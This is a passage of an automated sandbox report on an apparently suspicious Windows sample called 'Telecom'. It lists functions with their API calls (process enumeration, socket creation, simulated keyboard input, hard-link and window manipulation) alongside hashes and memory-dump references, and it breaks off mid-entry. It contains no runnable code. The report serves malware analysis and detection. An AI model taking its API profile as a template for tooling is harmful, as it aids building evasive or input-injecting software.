Instruction ID: a3055aabce1cf6d94b0e0577395a7d418af75e9f014818e701f5a83e20d631a9
Opcode Fuzzy Hash: cf92f8e7b63dca8c77997f149043c5185e7d94837991fdadc71efd6e3336d6e6
Instruction Fuzzy Hash: 7D813672A00109EFCB00DF94C984EEEB7B9FF89315F204599F516AB250DB75AE06CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004CB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004CB10C
Process32FirstW.KERNEL32(00000000,?), ref: 004CB11A

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Process32NextW.KERNEL32(00000000,?), ref: 004CB1FC
CloseHandle.KERNEL32(00000000), ref: 004CB20B

Part of subcall function 0045E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00484D73,?), ref: 0045E395

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 9f3d2a1c6602470ff8ac0a471078dc41f941f4f5ec980586fd27f1c0ec0376f2
Instruction ID: a02b3febb8235c81ca04bae25477c0057d456f7e3774b96bcca606e1d945333b
Opcode Fuzzy Hash: 9f3d2a1c6602470ff8ac0a471078dc41f941f4f5ec980586fd27f1c0ec0376f2
Instruction Fuzzy Hash: D7513AB1908300AFD350EF25C886A5BBBE8FF89758F40492EF98597251EB34D904CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004C2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004C255A
WSAGetLastError.WSOCK32 ref: 004C2568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004C25E7
WSAGetLastError.WSOCK32 ref: 004C25F1

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 165701125adae535267ef3a2d35ac0128c8a5441298212ce96370536511dd00b
Instruction ID: e1772c2eb1cb7dd158324f9f3a04b21ab46ba17d53fc660dc3470972cc706426
Opcode Fuzzy Hash: 165701125adae535267ef3a2d35ac0128c8a5441298212ce96370536511dd00b
Instruction Fuzzy Hash: 2C41C478A00200AFE721AF25C886F2A7795EB04758F54C45EF9158F3D3D7B6ED428B94

Uniqueness

Uniqueness Score: -1.00%

Function 004D6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004D6D1A
ScreenToClient.USER32(?,?), ref: 004D6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 004D6DBA

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 31d34fa976d7d2499a2634cc73209fb0366e392dfd0ec78f54e5682a0daebc08
Instruction ID: e69214812afb1191e7033db3bbddd1022e53f0fef3c08b0599631076838ff6aa
Opcode Fuzzy Hash: 31d34fa976d7d2499a2634cc73209fb0366e392dfd0ec78f54e5682a0daebc08
Instruction Fuzzy Hash: 5B513A34A00209AFCF24DF68D890AAE7BB6FB54320F11815BF9159B390D734AD81CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004B611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004B61C8
GetLastError.KERNEL32(?,00000000), ref: 004B61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004B6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004B623F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: ede3bd96a70ba814252d124254c96402fb70467593aab3cb1471642f984a3f6e
Instruction ID: c99cc9a97d6820673859ba7cc3975c49a665529810ad07922947369debbbaa92
Opcode Fuzzy Hash: ede3bd96a70ba814252d124254c96402fb70467593aab3cb1471642f984a3f6e
Instruction Fuzzy Hash: C3415E35600610DFDB10EF16C545A5EB7E2FF99314B19848EE84A9B362CB38FC01CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004AB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004AB473
SetKeyboardState.USER32(00000080), ref: 004AB48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004AB4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004AB54F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: aae662c8b62fcbf1016bafcba9d09307e64d7b32cbaaea8d0e4b26faae5b7ed4
Instruction ID: 756971e50eba30cb492d486f1b83c99b0d3b688fd98fd64b8801b50f62fb6baf
Opcode Fuzzy Hash: aae662c8b62fcbf1016bafcba9d09307e64d7b32cbaaea8d0e4b26faae5b7ed4
Instruction Fuzzy Hash: 24312670E406086EFB318A259C057FB7BB5EB6B314F04821BE095562D3C37D898287EA

Uniqueness

Uniqueness Score: -1.00%

Function 004AB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 004AB5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 004AB5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 004AB63B
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 004AB68D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ad8888d60643193f7d09808dc23d7d007d253c924cd3fe385195544afd6aac94
Instruction ID: 992073f5bee965a6c129388a2e2a0ead7af47ca19e69e3de058a0fcf3992d873
Opcode Fuzzy Hash: ad8888d60643193f7d09808dc23d7d007d253c924cd3fe385195544afd6aac94
Instruction Fuzzy Hash: C031EB30D406486EFF248B6588057FB7BA6FFA6314F04822BE485562D2C77C89568BDB

Uniqueness

Uniqueness Score: -1.00%

Function 004D80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004D80D4
GetWindowRect.USER32(?,?), ref: 004D814A
PtInRect.USER32(?,?,?), ref: 004D815A
MessageBeep.USER32(00000000), ref: 004D81C6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9aae4a073fafa7fd8b3d8df1120bc346ebacefed721799850d0eabb658185193
Instruction ID: c8304d031d10a33d21017e3234465dcfe3ddda9d7bdce936372fb94af79ccbd4
Opcode Fuzzy Hash: 9aae4a073fafa7fd8b3d8df1120bc346ebacefed721799850d0eabb658185193
Instruction Fuzzy Hash: 23419F30A01215DFCB11DF58C8A0AAEB7F5FB59314F1480AFE9549B365CB38E84ACB44

Uniqueness

Uniqueness Score: -1.00%

Function 004D2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004D2187

Part of subcall function 004A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004A43AD
Part of subcall function 004A4393: GetCurrentThreadId.KERNEL32 ref: 004A43B4
Part of subcall function 004A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004A2F00), ref: 004A43BB

GetCaretPos.USER32(?), ref: 004D219B
ClientToScreen.USER32(00000000,?), ref: 004D21E8
GetForegroundWindow.USER32 ref: 004D21EE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: ef87faf8d36c6736b374fb2279ca592d13589834958fc3bcd6a992c61b9eb45f
Instruction ID: afa43cdb769eb89be7157d97d742c3a1c3249da6a6038a9bdac6b545a36b52bb
Opcode Fuzzy Hash: ef87faf8d36c6736b374fb2279ca592d13589834958fc3bcd6a992c61b9eb45f
Instruction Fuzzy Hash: 05313271D01109AFDB04EFA6C9818AEB7F8EF98308B5084AFE415E7311D6759E45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004441EA: _wcslen.LIBCMT ref: 004441EF

_wcslen.LIBCMT ref: 004AE8E2
_wcslen.LIBCMT ref: 004AE8F9
_wcslen.LIBCMT ref: 004AE924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 004AE92F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 1d95114d3ad9d81702659367af971569f7a84288cab16cb1221010521d455718
Instruction ID: 0e2843db06927288e1878037541983035d323fa5a4848882440b8684f1d82d39
Opcode Fuzzy Hash: 1d95114d3ad9d81702659367af971569f7a84288cab16cb1221010521d455718
Instruction Fuzzy Hash: 8A21D871D00214AFDB10AFA5C981BAFB7B8EF96354F10406AE814AB341E6789E41C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004D321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 004D32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004D32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004D32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004D32DC

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: f480c178f78c4bdf62a488006f556b37875a2cde711b55900210c2d0c5032540
Instruction ID: 0f2e2321379e71721f03a126de775686514f2dc2558203a23bed82a7242dc52f
Opcode Fuzzy Hash: f480c178f78c4bdf62a488006f556b37875a2cde711b55900210c2d0c5032540
Instruction Fuzzy Hash: 3C21F331A05111AFD7009F14C865F6A7755AF41319F14829FF4268B392C779ED41C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 004A825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004A96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004A8271,?,000000FF,?,004A90BB,00000000,?,0000001C,?,?), ref: 004A96F3
Part of subcall function 004A96E4: lstrcpyW.KERNEL32(00000000,?), ref: 004A9719
Part of subcall function 004A96E4: lstrcmpiW.KERNEL32(00000000,?,004A8271,?,000000FF,?,004A90BB,00000000,?,0000001C,?,?), ref: 004A974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004A90BB,00000000,?,0000001C,?,?,00000000), ref: 004A828A
lstrcpyW.KERNEL32(00000000,?), ref: 004A82B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,004A90BB,00000000,?,0000001C,?,?,00000000), ref: 004A82EB

Strings

cdecl, xrefs: 004A82E2

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 6f7de106360283181a2309cfb2e795e115753017e82dfa53b7e3289de5fc164d
Instruction ID: c7b095465463838994006b9e3140b3a077b37d8657226b073f53c685fec828e0
Opcode Fuzzy Hash: 6f7de106360283181a2309cfb2e795e115753017e82dfa53b7e3289de5fc164d
Instruction Fuzzy Hash: 8211B17A200242ABCB149F39D845A7B77A9FF5A754B50402FF942C7290EF369811C799

Uniqueness

Uniqueness Score: -1.00%

Function 004D60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 004D615A
_wcslen.LIBCMT ref: 004D616C
_wcslen.LIBCMT ref: 004D6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 004D62B5

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 497014fb5683ed1faf3dbdc3309ca4aea9b4afa3e78cbcbfa7afe63b77d37752
Instruction ID: b6be9a1c42a9fb629fd342f55b7a753c2ad476f25d7f28c2ac073fc2a6b4bcac
Opcode Fuzzy Hash: 497014fb5683ed1faf3dbdc3309ca4aea9b4afa3e78cbcbfa7afe63b77d37752
Instruction Fuzzy Hash: A011D335500208A6EF10DFA58C94AEF77BCEB11354F10412BF911D6382EB78C945DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00472079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76445e723f028f7b09d110ace7de2bbaa78a0b1120c983dd4081395113d2e651
Instruction ID: 96f975c31c735aed66156c55f83d166bd3cb21b6939f8140e6b587a3323c7f04
Opcode Fuzzy Hash: 76445e723f028f7b09d110ace7de2bbaa78a0b1120c983dd4081395113d2e651
Instruction Fuzzy Hash: 8E01A2B2A052567FF62126797DC1FA7670DDF413B8B30C32BF629A12D1DEA88C419178

Uniqueness

Uniqueness Score: -1.00%

Function 004A2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 004A2394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004A23A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004A23BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004A23D7

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 38c2879086be66e1ae8ee268f656b1b5b94849834cc1ceb613eaa269e844afea
Instruction ID: 0d25bd3939f21db1295467000f4a7fda18c3c839db3e3a771d2ece22439f1728
Opcode Fuzzy Hash: 38c2879086be66e1ae8ee268f656b1b5b94849834cc1ceb613eaa269e844afea
Instruction Fuzzy Hash: 7F110C36901218FFDF119BA9CD85F9EBBB8FB09750F200096EA01B7290D6756E11EB94

Uniqueness

Uniqueness Score: -1.00%

Function 004AEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004AEB14
MessageBoxW.USER32(?,?,?,?), ref: 004AEB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004AEB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004AEB64

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: bc90e06c929f59abeb6dfceb442f5c95fb5d09e9083e66a8db50ca00226c8de2
Instruction ID: 976dca487cba6b8f450a0ae821002616ac351a67dd4fde11c24a645ab471b341
Opcode Fuzzy Hash: bc90e06c929f59abeb6dfceb442f5c95fb5d09e9083e66a8db50ca00226c8de2
Instruction Fuzzy Hash: 371108B2D00218BBCB019BA99C09ADF7FACEB56310F108227F835D3290D678990487B5

Uniqueness

Uniqueness Score: -1.00%

Function 0046D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0046D369,00000000,00000004,00000000), ref: 0046D588
GetLastError.KERNEL32 ref: 0046D594
__dosmaperr.LIBCMT ref: 0046D59B
ResumeThread.KERNEL32(00000000), ref: 0046D5B9

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: e4d7da0199cf14bef9ec069c9d575f4ce711225c6afcdf42ddbbabf55865533e
Instruction ID: 8245859d0250f256e94d704d6e72118bccbafbd3b529951577b232ed7d008ca5
Opcode Fuzzy Hash: e4d7da0199cf14bef9ec069c9d575f4ce711225c6afcdf42ddbbabf55865533e
Instruction Fuzzy Hash: 6301DB32E01114BBCB106F66DC05BAB7B58EF41338F10021BF925861D0EF749801C6AB

Uniqueness

Uniqueness Score: -1.00%

Function 004733E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0047338D,00000364,00000000,00000000,00000000,?,004735FE,00000006,FlsSetValue), ref: 00473418
GetLastError.KERNEL32(?,0047338D,00000364,00000000,00000000,00000000,?,004735FE,00000006,FlsSetValue,004E3260,FlsSetValue,00000000,00000364,?,004731B9), ref: 00473424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0047338D,00000364,00000000,00000000,00000000,?,004735FE,00000006,FlsSetValue,004E3260,FlsSetValue,00000000), ref: 00473432

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e103f83ccdd90b25a504b68e8ee40cbde41694f57e01d3051595d2c1fbc7617e
Instruction ID: f64e7ed9515725917083b5639ff9016ec6465a3dc040d059a6b7127dd5e75076
Opcode Fuzzy Hash: e103f83ccdd90b25a504b68e8ee40cbde41694f57e01d3051595d2c1fbc7617e
Instruction Fuzzy Hash: AC01FC32A52222ABCB364F79DC449D73B58BF05B627218632F90EE7241C724DD02D6EC

Uniqueness

Uniqueness Score: -1.00%

Function 004D886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004D888E
